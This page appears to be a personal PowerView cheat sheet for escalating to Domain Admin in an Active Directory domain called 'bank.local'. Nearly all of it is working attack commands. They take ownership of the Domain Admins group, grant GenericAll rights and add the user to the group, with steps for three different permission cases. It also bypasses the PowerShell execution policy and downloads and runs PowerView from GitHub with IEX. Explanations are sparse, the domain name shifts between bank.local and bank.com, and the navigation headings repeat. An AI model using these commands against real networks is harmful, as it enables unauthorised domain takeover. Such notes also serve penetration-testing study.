Powerview_cheet

Power view cheat sheet

Commands

Note: Domain = `bank.local`, User = `goodboy`

powershell -ep bypass
Import-Module .\PowerView.ps1
Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'goodboy'
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "Domain Admins" -PrincipalIdentity "goodboy"
net group "domain admins" goodboy /add /domain

Import the AD module (requires RSAT or AD PowerShell tools)

Import-Module ActiveDirectory

Now try the command again

$acl = Get-Acl "AD:\CN=Domain Admins,CN=Users,DC=bank,DC=com"
$groupDN = "LDAP://CN=Domain Admins,CN=Users,DC=bank,DC=com"
$acl = [System.DirectoryServices.DirectoryEntry]::new($groupDN).ObjectSecurity

Create the AD: drive if missing

New-PSDrive -Name AD -PSProvider ActiveDirectory -Root "" -Server "bank.com"

Now get ACL

$acl = Get-Acl "AD:\CN=Domain Admins,CN=Users,DC=bank,DC=com"

Take ownership

$group = [ADSI]"LDAP://CN=Domain Admins,CN=Users,DC=bank,DC=local"
$group.psbase.ObjectSecurity.SetOwner([System.Security.Principal.NTAccount]("bank\goodboy"))
$group.psbase.CommitChanges()

Add self to group

$group.Add("LDAP://CN=goodboy,CN=Users,DC=bank,DC=local")

Key Explanations:

Permission Why Needed

Modify owner
Modify permissions
Write properties

1. with ✔ Modify permissions

IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1")
Get-Command -Module PowerView

Note: (If blocked by execution policy, run: Set-ExecutionPolicy Bypass -Scope Process -Force first)
Verify if 'bb2' has WriteDACL on Domain Admins

Get-DomainObjectAcl -Identity "Domain Admins" | Where-Object { $_.SecurityIdentifier -eq (Get-DomainUser "bb2").SID } | Select-Object ActiveDirectoryRights

Add GenericAll permission

Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity "bb2" -Rights All -Verbose

Add your account to the group

Add-DomainGroupMember -Identity "Domain Admins" -Members "bb2" -Verbose

Verify

Get-DomainGroupMember -Identity "Domain Admins" | Select-Object MemberName

2. with permission - write all properties ✔ is only enabled

if powerview fails

$Group = [ADSI]"LDAP://CN=Domain Admins,CN=Users,DC=bank,DC=local"
$Group.Add("LDAP://CN=master,CN=Users,DC=bank,DC=local")

3. with permissions - ✔ modify owner is only enabled

IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1")

or download the script and run by import

powershell -ep bypass
Import-Module .\powerview.ps1
Get-Command Set-DomainObjectOwner, Add-DomainObjectAcl
Set-ExecutionPolicy Bypass -Scope Process -Force

1.Take ownership

Set-DomainObjectOwner -Identity "Domain Admins" -OwnerIdentity "usermad" -Verbose

2.Grant yourself Generic All

Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity "usermad" -Rights All -Verbose

3.Add to group

Add-DomainGroupMember -Identity "Domain Admins" -Members "usermad" -Verbose

PreviousPowerview NextDirectory Enum(RPC client)

Last updated 3 months ago

Good night

hashtagPower view cheat sheet

hashtagCommands

hashtagNote: Domain = bank.local, User = goodboy

hashtagImport the AD module (requires RSAT or AD PowerShell tools)

hashtagNow try the command again

hashtagKey Explanations:

hashtagPermission Why Needed

hashtag1. with ✔ Modify permissions

hashtag2. with permission - write all properties ✔ is only enabled

hashtagif powerview fails

hashtag3. with permissions - ✔ modify owner is only enabled

Power view cheat sheet

Commands

Note: Domain = `bank.local`, User = `goodboy`

Import the AD module (requires RSAT or AD PowerShell tools)

Now try the command again

Key Explanations:

Permission Why Needed

1. with ✔ Modify permissions

2. with permission - write all properties ✔ is only enabled

if powerview fails

3. with permissions - ✔ modify owner is only enabled